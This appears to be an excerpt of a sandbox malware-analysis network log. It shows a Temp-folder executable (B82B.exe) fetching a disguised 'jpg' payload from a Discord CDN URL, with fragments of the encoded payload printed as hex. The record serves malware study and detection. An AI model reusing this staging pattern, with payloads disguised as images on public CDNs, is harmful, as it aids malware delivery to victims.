                                                  2021-10-29 18:29:53 UTC1605INData Raw: 4e 20 59 4c 20 4e 59 4d 20 4c 4d 20 56 72 20 4c 4e 20 4e 43 43 20 4e 59 4d 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 57 4d 20 4e 59 4d 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 59 56 20 4e 59 4d 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 59 4c 20 4e 59 4d 20 4c 4d 20 4c 56 20 4e 20 43 20 43 20 43 20 4c 4e 20 59 4d 20 4e 59 4d 20 4c 4d 20 56 4c 20 4c 4e 20 72 63 20 4e 59 4d 20 4c 4d 20 4c 56 20 43 20 43 20 43 20 43 20 4c 4e 20 72 57 20 4e 59 4d 20 4c 4d 20 4c 56 20 43 20 43 20 43 20 43 20 4c 4e 20 59 4d 20 4e 59 4d 20 4c 4d 20 4c 56 20 43 20 43 20 43 20 43 20 4c 4e 20 72 57 20 4e 59 4d 20 4c 4d 20 4c 56 20 43 20 43 20 43 20 43 20 4c 4e 20 57 4d 20 4e 59 4d 20 4c 4d 20 56 56 20 4c 4e 20 4e 43 59 20 4e 59 4d 20 4e 4e 59 20
                                                  Data Ascii: N YL NYM LM Vr LN NCC NYM LM LV N C C C LN WM NYM LM LV N C C C LN YV NYM LM LV N C C C LN YL NYM LM LV N C C C LN YM NYM LM VL LN rc NYM LM LV C C C C LN rW NYM LM LV C C C C LN YM NYM LM LV C C C C LN rW NYM LM LV C C C C LN WM NYM LM VV LN NCY NYM NNY
                                                  2021-10-29 18:29:53 UTC1621INData Raw: 20 72 4c 20 43 20 4e 72 4e 20 4e 20 56 4c 4c 20 43 20 4e 57 20 43 20 4e 72 4c 20 56 20 43 20 4e 20 4e 57 20 43 20 4e 4c 56 20 4e 20 43 20 4e 20 56 4d 20 43 20 4e 72 4e 20 4e 20 4c 20 4e 20 4d 59 20 43 20 4e 72 4e 20 4e 20 4c 20 4e 20 4e 4e 20 43 20 4e 59 56 20 56 20 4c 20 4e 20 4e 57 20 43 20 4e 72 4c 20 56 20 4c 56 20 4e 20 4e 57 20 43 20 4e 4c 56 20 4e 20 4c 56 20 4e 20 56 4d 20 43 20 4e 72 4e 20 4e 20 4c 4c 20 4e 20 4d 59 20 43 20 4e 72 4e 20 4e 20 4c 4c 20 4e 20 4e 43 4d 20 43 20 4e 43 20 4c 20 4c 59 20 4e 20 4c 59 20 43 20 4e 72 4e 20 4e 20 4c 59 20 4e 20 72 4c 20 43 20 4e 72 4e 20 4e 20 4c 59 20 4e 20 57 4e 20 43 20 4e 72 4e 20 4e 20 4c 59 20 4e 20 4d 59 20 43 20 4e 72 4e 20 4e 20 72 4e 20 4e 20 59 4e 20 43 20 56 72 56 20 56 20 63 72 20 4e 20 4e 57
                                                  Data Ascii: rL C NrN N VLL C NW C NrL V C N NW C NLV N C N VM C NrN N L N MY C NrN N L N NN C NYV V L N NW C NrL V LV N NW C NLV N LV N VM C NrN N LL N MY C NrN N LL N NCM C NC L LY N LY C NrN N LY N rL C NrN N LY N WN C NrN N LY N MY C NrN N rN N YN C VrV V cr N NW
                                                  2021-10-29 18:29:53 UTC1637INData Raw: 56 20 4e 43 4e 20 4e 4e 43 20 4e 4e 43 20 4e 43 59 20 4e 43 49 20 4e 43 4e 20 4e 4e 59 20 4e 4e 59 20 43 20 4e 43 4c 20 4e 43 4e 20 4e 4e 63 20 57 59 20 63 49 20 57 4d 20 4e 4e 4d 20 4e 4e 43 20 4e 4e 63 20 4e 43 49 20 4e 43 4e 20 4e 4e 59 20 4e 4e 59 20 4e 4e 43 20 4e 43 4e 20 4e 4e 59 20 4e 4e 59 20 43 20 4d 4e 20 4e 43 4e 20 4e 4e 63 20 49 43 20 4e 4e 72 20 4e 4e 4e 20 57 57 20 63 59 20 4e 43 43 20 4e 43 43 20 4e 4e 72 20 4e 43 4e 20 4e 4e 59 20 4e 4e 59 20 43 20 4d 4d 20 4e 43 59 20 57 57 20 4e 4e 72 20 4e 4e 4e 20 4e 4e 59 20 4e 4e 4e 20 4e 43 56 20 4e 4e 63 20 72 63 20 49 63 20 4e 43 59 20 4e 4e 59 20 4e 4e 4d 20 57 4d 20 4e 43 49 20 49 4c 20 4e 4e 63 20 4e 4e 4d 20 4e 43 43 20 4e 43 59 20 4e 4e 4e 20 72 63 20 49 72 20 4e 43 4e 20 4e 4e 59 20 4e 4e
                                                  Data Ascii: V NCN NNC NNC NCY NCI NCN NNY NNY C NCL NCN NNc WY cI WM NNM NNC NNc NCI NCN NNY NNY NNC NCN NNY NNY C MN NCN NNc IC NNr NNN WW cY NCC NCC NNr NCN NNY NNY C MM NCY WW NNr NNN NNY NNN NCV NNc rc Ic NCY NNY NNM WM NCI IL NNc NNM NCC NCY NNN rc Ir NCN NNY NN


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.749794162.159.135.233443C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2021-10-29 18:30:02 UTC1652OUTGET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2021-10-29 18:30:02 UTC1652INHTTP/1.1 200 OK
                                                  Date: Fri, 29 Oct 2021 18:30:02 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 1023400
                                                  Connection: close
                                                  CF-Ray: 6a5e790bdec54d89-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 280498
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "a79ffe2a90ab83e54cd38dd94a2b6a6d"
                                                  Expires: Sat, 29 Oct 2022 18:30:02 GMT
                                                  Last-Modified: Tue, 26 Oct 2021 11:56:33 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1635249393939568
                                                  x-goog-hash: crc32c=mLSBFQ==
                                                  x-goog-hash: md5=p5/+KpCrg+VM043ZSitqbQ==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 1023400
                                                  X-GUploader-UploadID: ADPycduXLAU0rhkOYYdjTYv8nzQOrUiGMR0rq3qWR-Mu3t2dKo7sgrujSRwPDi2ARPYGwmCnqDDiBBlucDqiDRky3RaT0EIS3w
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Qtg1QwphCS%2FsF75XSz8LQnY%2B2UcA73W%2BbI3ytV9qqkmDRSc5f2STuD7h5u4ehrVB6ZpmLlCwCi0AfUs1gCj8CJ4K6OIYpiILfWcIsmHph6PtV7FWezXaQsa8Vgnd%2Fl%2BAiTAr1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  2021-10-29 18:30:02 UTC1653INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                  2021-10-29 18:30:02 UTC1653INData Raw: 78 4f 6f 45 4b 59 52 74 6b 51 2d 74 74 20 51 78 20 4f 4b 4b 20 78 20 45 20 78 20 78 20 78 20 4b 20 78 20 78 20 78 20 6f 59 59 20 6f 59 59 20 78 20 78 20 4f 6b 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 52 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 4f 6f 6b 20 78 20 78 20 78 20 4f 4b 20 45 4f 20 4f 6b 52 20 4f 4b 20 78 20 4f 6b 78 20 51 20 6f 78 59 20 45 45 20 4f 6b 4b 20 4f 20 74 52 20 6f 78 59 20 45 45 20 6b 4b 20 4f 78 4b 20 4f 78 59 20 4f 4f 59 20 45 6f 20 4f 4f 6f 20 4f 4f 4b 20 4f 4f 4f 20 4f 78 45 20 4f 4f 4b 20 51 74 20 4f 78 51 20 45 6f 20 51 51 20 51 74 20 4f 4f 78 20 4f
                                                  Data Ascii: xOoEKYRtkQ-tt Qx OKK x E x x x K x x x oYY oYY x x OkK x x x x x x x RK x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x Ook x x x OK EO OkR OK x Okx Q oxY EE OkK O tR oxY EE kK OxK OxY OOY Eo OOo OOK OOO OxE OOK Qt OxQ Eo QQ Qt OOx O
                                                  2021-10-29 18:30:02 UTC1654INData Raw: 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 6f 59 20 4b 78 20 6f 6f 51 20 4f 78 51 20 4f 4f 59 20 59 78 20 4b 6b 20 59 78 20 59 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 4b 52 20 4f 4b 45 20 59 78 20 4b 6b 20 4f 45 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59
                                                  Data Ascii: x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x oY Kx ooQ OxQ OOY Yx Kk Yx Yx kK OOK OOt OKR OKE Yx Kk OEk YK kK OOK OOt OxQ OOo Yx OOo Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Y
                                                  2021-10-29 18:30:02 UTC1656INData Raw: 20 4f 78 20 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 45 6f 20 4f 6b 45 20 59 59 20 6b 4b 20 4f 4f 4b 20 6b 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 6b 4b 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 20 59 4b 20 6b 4b 20 4f 6b 20 51 4f 20 45 4f 20 45 20 52 4b 20 6b 45 20 59 78 20 59 4b 20 6b 4b 20 4f 74 6b 20 4f 4f 6b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 4b 78 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 51 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 59 45 20 4f 78 51
                                                  Data Ascii: Ox O OxQ OOo Yx OEo OkE YY kK OOK kY OxQ OOo Yx OkK YO YK kK OOk OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Ok YK kK Ok QO EO E RK kE Yx YK kK Otk OOk OxQ OOo Yx oKx YO YK kK OOk OOt OxQ OOo OQx KQ Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK YE OxQ
                                                  2021-10-29 18:30:02 UTC1657INData Raw: 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f
                                                  Data Ascii: OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo
                                                  2021-10-29 18:30:02 UTC1658INData Raw: 4f 78 51 20 4f 4f 6f 20 59 52 20 45 51 20 45 74 20 4b 74 20 6f 4f 74 20 4b 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 6f 45 20 45 6b 20 52 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 59 20 45 4f 20 4b 4f 20 59 78 20 4b 6b 20 52 52 20 74 6f 20 74 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4b 59 20 4b 6b 20 59 78 20 52 78 20 6f 4b 52 20 6b 74 20 51 6b 20 45 4f 20 4f 20 59 78 20 4b 6b 20 52 52 20 52 6b 20 6f 59 4f 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 4f 4b 20 4b 4b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4f 4b 4b 20 6f 4f 20 4b 6f 20 52 6b 20 4f 4b 74 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 6f 20 59 45 20 4b 51 20 59 78 20 74 78 20 4b 6f 20 4f 78 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 4b 74 20 59 78 20
                                                  Data Ascii: OxQ OOo YR EQ Et Kt oOt Ko OOt OxQ OOE oE Ek RK YY kK OOK Y EO KO Yx Kk RR to tK OOK OOt OxE kk KY Kk Yx Rx oKR kt Qk EO O Yx Kk RR Rk oYO OOK OOt oQ OK KK Kk Yx Rx OoK OxQ OOt OxQ Ooo OKK oO Ko Rk OKt OOK OOt oQ o YE KQ Yx tx Ko Oxk OOt OxQ Ooo oR Kt Yx
                                                  2021-10-29 18:30:02 UTC1660INData Raw: 74 6b 20 6f 78 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 45 20 52 51 20 4f 4f 4b 20 59 78 20 4b 6b 20 6f 59 20 6b 51 20 4f 4f 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 74 20 59 59 20 45 45 20 59 4b 20 6f 78 78 20 6b 6f 20 4f 52 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 52 59 20 45 78 20 59 78 20 59 4b 20 51 4b 20 4f 6f 20 4f 45 51 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4f 20 45 4f 20 45 45 20 4f 4f 4b 20 4f 6f 20 4f 4b 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 78 52 20 59 6f 20 6f 45 59 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 51 59 20 59 78 20 4b 6b 20 59 52 20 4f 51 20 6f 4f 6f 20 4f 4b 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 52 20 59 4f 20 59 78 20 59 4b 20 4f 6f 74 20 6f 51 20 51 59 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 45 45 20 59 59 20 45 51 20 6b
                                                  Data Ascii: tk oxE kK OOK OOE RQ OOK Yx Kk oY kQ OOo OOY OOt Oxt Qt YY EE YK oxx ko ORK OOR OxQ OOk RY Ex Yx YK QK Oo OEQ OxQ OOo YK oO EO EE OOK Oo OKo OxQ OOo YK oxR Yo oEY kY OOK OOY Ex QY Yx Kk YR OQ oOo OKx OOt OxQ OOR oR YO Yx YK Oot oQ QY Oxk OOo Yo EE YY EQ k
                                                  2021-10-29 18:30:02 UTC1661INData Raw: 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 51 78 20 74 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 51 20 59 45 20 45 78 20 4f 4f 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 45 20 59 45 20 59 4b 20 52 45 20 6f 45 59 20 4f 6f 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 59 52 20 59 78 20 59 4b 20 6b 6f 20 4f 6f 52 20 4f 4f 4b 20 45 78 20 6f 4f 51 20 59 78 20 4b 6b 20 59 6f 20 45 74 20 6b 78 20 51 51 20 4f 4f 45 20 4f 4f 45 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 6f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 45 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 74 59 20 4f 78 6f 20 45 45 20
                                                  Data Ascii: OxQ Ooo RY k Yx YK QK Qx tR OxQ OOo YR YQ YE Ex OOx OOK OOt OxE QE YE YK RE oEY Oot OOY OOt OxQ OOK oR YR Yx YK ko OoR OOK Ex oOQ Yx Kk Yo Et kx QQ OOE OOE oYE OxK Kk Yx YY OOE ORo ooo OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OEY kK OOK OOY tY Oxo EE
                                                  2021-10-29 18:30:02 UTC1662INData Raw: 6f 20 59 78 20 4b 6b 20 59 6f 20 59 4b 20 6b 4b 20 4f 4f 4b 20 45 6b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 4f 78 59 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 52 4f 20 4b 6b 20 59 78 20 59 59 20 74 51 20 52 52 20 4f 4f 59 20 4f 78 51 20 59 6f 20 4b 6b 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 45 78 20 74 51 20 59 78 20 4b 6b 20 59 52 20 52 78 20 6b 52 20 4f 4f 4f 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 6f 45 78 20 4f 4b 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 6b 6b 20 59 20 4b 6b 20 59 78 20 52 78 20 45 51 20 74 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 51 20 59 78 20 59 4b 20 51 4b 20 4f 6f 4f 20 4f 4f 4b 20 52 51 20 74 4b 20 59 78 20 4b 6b 20 59 52 20 6f 74 20 6b 45
                                                  Data Ascii: o Yx Kk Yo YK kK OOK Ek Oxk OOo Yx OxY YO YK kK OOE OOt OxQ OOo RO Kk Yx YY tQ RR OOY OxQ Yo Kk Kk Yx YE kK OOK Oxx Ex tQ Yx Kk YR Rx kR OOO oKk YY OOo Yx KQ oE oEx OKx OOK OOt OxY kk Y Kk Yx Rx EQ tK OOt OxQ Ooo oR Q Yx YK QK OoO OOK RQ tK Yx Kk YR ot kE
                                                  2021-10-29 18:30:02 UTC1664INData Raw: 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 6f 4f 4b 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 74 6f 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 6b 45 20 51 51 20 4f 4f 45 20 4f 6f 4b 20 4f 4f 74 20 4b 59 20 52 45 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 4f 59 59 20 4b 6b 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 52 20 6f 52 20 4b 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f
                                                  Data Ascii: OK OOK OOt Oxk kY ooR oOK Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot o to YO Kk Yo EQ kE QQ OOE OoK OOt KY RE OQO Oxk kK OOK OOR to ORx OYY Kk Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK oQ oOt OxQ OOo Yo YR oR Kk kK OOK OOY o
                                                  2021-10-29 18:30:02 UTC1665INData Raw: 45 20 4b 4f 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 4f 45 6f 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 6f 52 20 4f 4f 51 20 45 59 20 59 59 20 4b 45 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 4f 59 51 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4f 20 4b 4f 20 52 51 20 4f 4f 74 20 4f 78 6b 20 6f 6f 4b 20 4b 6f 20 59 78 20 4b 6b 20 59 4f 20 4f 51 20 4f 45 6f
                                                  Data Ascii: E KO Okt OK OOK OOt Oxk kY ooR OEo Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot OoR OOQ EY YY KE Okt OK OOK OOt Oxk kY ooR OYQ Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR KY OOo Yx Yk EO KO RQ OOt Oxk ooK Ko Yx Kk YO OQ OEo
                                                  2021-10-29 18:30:02 UTC1666INData Raw: 59 20 59 59 20 4f 4b 20 52 51 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 78 78 20 45 45 20 59 4b 20 45 59 20 59 78 20 52 51 20 4f 4f 51 20 4f 78 52 20 4f 6f 78 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 4f 59 74 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 4f 20 6b 6b 20 59 6f 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4f 20 4f 4f 51 20 4f 78 51 20 78 20 74 52 20 4b 52 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 78 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 59 45 20 52 51 20 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 51 20 59 6b 20 45 45 20 59 6b 20 45 51 20 6b 78 20 51 51 20 4f
                                                  Data Ascii: Y YY OK RQ OOY OOt OxQ Oxx EE YK EY Yx RQ OOQ OxR Oox oYE OxK Kk Yx YY OOE ORo OYt OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OYK kK OOK OOY OxO kk Yo Kk Yx Kk Ek O OOQ OxQ x tR KR Yx YK QK oQ OxR OxQ OOo YR EY YE RQ OR OOY OOt Oxt QQ Yk EE Yk EQ kx QQ O
                                                  2021-10-29 18:30:02 UTC1668INData Raw: 45 20 4f 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4b 20 52 20 4f 20 4b 6f 20 4b 6b 20 45 45 20 59 51 20 6b 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4b 59 20 4f 20 4f 20 59 74 20 6b 74 20 51 78 20 52 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 78 20 6f 52 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 45 20 51 4f 20 52 78 20 59 78 20 45 52 20 45 4b 20 4f 6f 4b 20 6b 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 51 45 20 4f 4f 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6f 20 6f 6b 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 78 20 45 20 4f 4f 4f 20 4f 4f 4b 20 4f 4f 6b 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 45 45 20 52 20 6b 52 20 4f 4f 4b 20 6b 6f 20 4f 78 51 20
                                                  Data Ascii: E Ot kK OOK Oot OOK R O Ko Kk EE YQ kY OOt OxQ Ooo KY O O Yt kt Qx Ro OxQ OOo YR Yx oR Kx kK OOK OOY OxE QO Rx Yx ER EK OoK kK OOt OxQ OOk QE OO Yx YK QK Oox OtO OOx kR oER Kk Yo ok kY Qk OOt OxQ OOo Yx YK Yx E OOO OOK OOk Qk OOo Yx KQ EE R kR OOK ko OxQ
                                                  2021-10-29 18:30:02 UTC1669INData Raw: 4f 4f 52 20 51 45 20 4f 78 4f 20 4f 4f 6f 20 59 78 20 6f 74 20 51 45 20 6f 4b 6b 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 6f 20 4f 52 4f 20 59 4f 20 4b 6b 20 59 6f 20 52 78 20 4f 45 6b 20 4f 4f 45 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 6f 45 52 20 59 4f 20 6f 78 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 45 20 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 74 20 4b 51 20 59 78 20 59 4b 20 74 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6b 45 20 59 4f 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 4b 20 59 4f 20 59 4b 20 6b 4b 20 51 78 20 4f 4f 52 20 4f 78 51
                                                  Data Ascii: OOR QE OxO OOo Yx ot QE oKk kY OOK OOY o ORO YO Kk Yo Rx OEk OOE kE OtQ OOo oER YO ox oEo kK OOR QY OxQ OOo Yx OOE R YK kK OOK OOt OxQ OOo Yt KQ Yx YK tR OOK OOt OxQ kE YO Kk Yx YE kK OOK OOt Qk OOo Yx KQ Yx YK kK OOK OoO OxQ OOo Yx KK YO YK kK Qx OOR OxQ
